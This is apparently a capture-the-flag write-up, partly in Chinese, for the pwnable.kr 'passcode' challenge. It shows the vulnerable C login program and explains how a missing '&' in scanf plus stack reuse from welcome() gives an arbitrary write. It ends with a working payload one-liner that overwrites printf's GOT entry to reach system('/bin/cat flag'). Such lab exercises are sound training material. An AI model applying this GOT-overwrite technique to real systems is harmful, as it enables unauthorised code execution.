passcode
Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?
ssh passcode@pwnable.kr -p2222 (pw:guest)
程序源码如下:
#include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha! mommy told me that 32bit is vulnerable to bruteforcing :) printf("enter passcode2 : "); scanf("%d", passcode2); printf("checking...\n"); if(passcode1==338150 && passcode2==13371337){ printf("Login OK!\n"); system("/bin/cat flag"); } else{ printf("Login Failed!\n"); exit(0); } } void welcome(){ char name[100]; printf("enter you name : "); scanf("%100s", name); printf("Welcome %s!\n", name); } int main(){ printf("Toddler's Secure Login System 1.0 beta.\n"); welcome(); login(); // something after login... printf("Now I can safely trust you that you have credential :)\n"); return 0; }
login函数中scanf未加取地址符,因此实际上将会把passcode1和passcode2的值作为地址输入数据
如果能控制passcode1或者passcode2的值就可以在任意地方写入
通过调试可以得到,welcome中name距离login中passcode1的位置仅有96,因此name输入100个字符就可以控制passcode1的初始值,但是无法控制passcode2
因此可以把passcode1的初始值设为printf的plt表,然后在输入passcode1时,将printf的plt表改为调用system("/bin/cat flag")的位置
获取plt表位置可以用readelf -r ./passcode,获取system("/bin/cat flag")位置可以在gdb中通过disassemble命令得到
因此通过python将输入传入passcode中
python -c "print 'a'*96+'\x00\xa0\x04\x08'+'134514147\n'" | ./passcode